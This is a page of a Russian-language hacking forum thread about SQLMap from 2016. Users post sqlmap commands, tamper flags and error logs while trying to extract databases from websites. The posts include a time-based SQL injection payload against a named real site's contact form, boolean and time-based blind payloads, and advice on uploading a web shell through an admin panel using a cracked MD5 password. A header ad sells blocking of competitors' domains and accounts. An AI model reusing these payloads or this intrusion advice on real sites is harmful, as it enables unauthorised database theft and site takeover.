Вопросы по SQLMap

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 23 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#221

16.09.2016, 12:13

PoliGroS

Познающий

Регистрация: 29.03.2012

Сообщений: 77

Провел на форуме:
14367

Репутация: 0

[11:03:22] [INFO] fetching tables for database: 'information_schema'

[11:03:22] [INFO] fetching number of tables for database 'information_schema'

[11:03:22] [INFO] retrieved:

[11:03:22] [WARNING] unable to retrieve the number of tables for database 'information_schema'

[11:03:22] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] y

[11:03:24] [INFO] checking table existence using items from 'C:\sql\txt\common-tables.txt'

[11:03:24] [INFO] adding words used on web page to the check list

[11:03:24] [INFO] starting 10 threads

[11:06:07] [WARNING] no table(s) found

No tables found

[11:06:07] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 2948 times

Питаюсь достать инфу и в итоге ничего. спасибо жду вашей help

#222

16.09.2016, 12:28

PoliGroS

Познающий

Регистрация: 29.03.2012

Сообщений: 77

Провел на форуме:
14367

Репутация: 0

Цитата:

Сообщение от None

http://www.warrelics.eu:80/classifieds/contact.php
(POST)
uid=11142&cap=165857 and (select*from(select(sleep(20)))a)-- &productid=11141&youremail=
winter@example.com
&contact=11142&final=yes&rpass=
555-555-0199@example.com

Цитата:

Сообщение от None

помогите расскрутить

" if author else f"

Цитата:

Сообщение от None

помогите расскрутить

#223

16.09.2016, 12:30

Qiezo

Новичок

Регистрация: 16.09.2016

Сообщений: 1

Провел на форуме:
312

Репутация: 0

Приветствую, нужна ваша помощь!

Команды:

1. Sqlmap.py -r "txt" --dbs

Пытаясь найти базу выдает вот это:

Код:

[16:30:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing a valid value for option '--string' as perh
aps the string you have chosen does not match exclusively True responses. If you
suspect that there is some kind of protection mechanism involved (e.g. WAF) may
be you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

2. Sqlmap.py -r "txt" -v 3 --tamper="space2comment" --random-agent --no-cast --time-sec=10

после нее вот это:

Код:

[16:12:56] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing either a valid value for option '--string'
(or '--regexp')

3. Sqlmap.py -r "txt" --stringer --regexp

После нее возникает снова крит "--tramp space2comment".

и так по кругу... В чем ошибка и как это все сделать правильно, заранее спасибо!

#224

17.09.2016, 10:03

masterdolicjakov

Новичок

Регистрация: 17.09.2016

Сообщений: 6

Провел на форуме:
1489

Репутация: 0

Привет!

Ув. форумчане, помогите пожалуйста!

Можно ли каким-то образом залить шелл?

#225

17.09.2016, 11:01

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Цитата:

Сообщение от masterdolicjakov

↑
Привет!
Ув. форумчане, помогите пожалуйста!
Можно ли каким-то образом залить шелл?

--is-dba

#226

17.09.2016, 11:32

masterdolicjakov

Новичок

Регистрация: 17.09.2016

Сообщений: 6

Провел на форуме:
1489

Репутация: 0

Цитата:

Сообщение от .Light.

↑
--is-dba

Привет!

Нет, к сожалению не под админом.

current user is DBA: False

#227

17.09.2016, 12:25

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Цитата:

Сообщение от masterdolicjakov

↑
Привет!
Нет, к сожалению не под админом.
current user is DBA: False

ищи админку значит,пробуй через нее залиться

#228

17.09.2016, 12:28

masterdolicjakov

Новичок

Регистрация: 17.09.2016

Сообщений: 6

Провел на форуме:
1489

Репутация: 0

Цитата:

Сообщение от .Light.

↑
ищи админку значит,пробуй через нее залиться

Админку нашел.

site.com/admin

Есть логин из базы и пасс в md5

В теме попросил расшифровать пасс.

А так больше нету вариантов?

Да, и спасибо что отвечаете!

#229

19.09.2016, 20:27

powerOfthemind

Познающий

Регистрация: 31.07.2015

Сообщений: 41

Провел на форуме:
9212

Репутация: 1

Как выбрать нужный playload.?

Parameter: m_id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH

Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й

#230

19.09.2016, 20:56

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от powerOfthemind

↑
Как выбрать нужный playload.?
Parameter: m_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH
Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й

Код:

~/sqlmapproject-sqlmap$ python sqlmap.py --help | grep tech
    techniques
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

--technique=B

Страница 23 из 115

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход